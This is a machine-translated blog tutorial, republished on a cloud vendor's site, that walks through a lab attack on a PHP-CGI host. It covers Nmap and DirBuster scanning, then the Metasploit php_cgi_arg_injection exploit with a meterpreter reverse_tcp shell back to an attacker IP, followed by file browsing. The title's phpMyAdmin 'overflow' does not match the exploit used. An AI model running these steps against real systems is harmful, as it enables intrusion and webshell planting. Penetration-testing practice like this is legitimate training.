Metasploit Overflow phpMyAdmin Vulnerability

Last Update:2016-12-12 Source: Internet

Author: User

Tags phpmyadmin

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Use phpMyAdmin vulnerability to upload Trojan horse program, get Webshell.

The CGI script did not properly handle the request parameters, causing the source code to leak, allowing the remote attacker to insert the execution command into the request parameters.

First, using the Nmap tool to scan the target host

The 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop and select "Open in Terminal" in the context menu.

1.2 Enter the command "NMAP–SV 192.168.1.3" in the terminal, the target host for port scanning, found open 80 port.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/8B/56/wKioL1hKMD3hu9atAAFM_tPfjEs447.jpg "style=" float: none; "title=" 1.jpg "alt=" Wkiol1hkmd3hu9ataafm_tpfjes447.jpg "/>

1.3 Enter "http:\\192.168.1.3" in the browser address bar to access the target site.

Second, using Dirbuster scan target host

2.1 Enter the command "Dirbuster" in the terminal and launch the software to scan the target website.

2.2 Enter "192.168.1.3" at the target URL, select the dictionary file (under/usr/share/dirbuster/wordlists/directory) at file with List of Dirs./file, click "Start" button to start the scan.

650) this.width=650; "src=" http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD6gLgktAAJBXeLhjWk333.jpg "style=" float: none; "title=" 2.jpg "alt=" Wkiom1hkmd6glgktaajbxelhjwk333.jpg "/>

2.3 Scan results display contains cgi-bin directories, phpMyAdmin directories, and so on.

650) this.width=650; "src=" http://s5.51cto.com/wyfs02/M00/8B/59/wKiom1hKMD_wFgL3AAEPuvVVb5M587.jpg "style=" float: none; "title=" 3.jpg "alt=" Wkiom1hkmd_wfgl3aaepuvvvb5m587.jpg "/>

Third, using Metasploit attack target host

3.1 Enter the command "Msfconsole" in the terminal to launch the MSF terminal.

3.2 Enter the command "search php_cgi" in the terminal to search for php_cgi related tools and attack loads.

3.3 Enter the command "use Exploit/multi/http/php_cgi_arg_injection" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.

650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMECSFcp4AABvzLI_vck240.jpg "style=" float: none; "title=" 4.jpg "alt=" Wkiol1hkmecsfcp4aabvzli_vck240.jpg "/>

3.4 Enter the command "show payloads" in the terminal to display code that can be executed on the remote host in Metasploit, that is, shellcode.

3.5 Enter the command "set PAYLOAD php/meterpreter/reverse_tcp" in the terminal to set the Shellcode code used.

3.6 Enter "show Options" in the terminal to show the parameters that the attack module needs to set.

3.7 Enter "set Lhost 192.168.1.2" in the terminal, set the IP address of the source host for the reverse link of the session.

3.8 Enter "set RHOST 192.168.1.3" in the terminal to set the IP of the target host.

650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M01/8B/59/wKiom1hKMECi4_scAAAwLWTM-ZA247.jpg "style=" float: none; "title=" 5.jpg "alt=" Wkiom1hkmeci4_scaaawlwtm-za247.jpg "/>

650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M00/8B/56/wKioL1hKMEHBzoNCAAD9EyYlPEg494.jpg "style=" float: none; "title=" 6.jpg "alt=" Wkiol1hkmehbzoncaad9eyylpeg494.jpg "/>

3.9 Enter "exploit" in the terminal to start attacking the target host.

650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M01/8B/56/wKioL1hKMEKjpkR8AAChA5MMct8360.jpg "style=" float: none; "title=" 7.jpg "alt=" Wkiol1hkmekjpkr8aacha5mmct8360.jpg "/>

3.10 Enter "SysInfo" in the terminal to view system environment information.

3.11 Enter "LS" in the terminal to display the contents of the file in the current directory.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/8B/59/wKiom1hKMEPB9A2KAAEC4hvPO1k940.jpg "style=" float: none; "title=" 8jpg.jpg "alt=" Wkiom1hkmepb9a2kaaec4hvpo1k940.jpg "/>

3.12 Enter "Cat phpinfo.php" in the terminal to view the contents of the file.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/8B/56/wKioL1hKMESjVon-AAAWhhmfqs0261.jpg "style=" float: none; "title=" 9.jpg "alt=" Wkiol1hkmesjvon-aaawhhmfqs0261.jpg "/>

This article is from the "12377962" blog, please be sure to keep this source http://12387962.blog.51cto.com/12377962/1881881

Metasploit Overflow phpMyAdmin Vulnerability

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More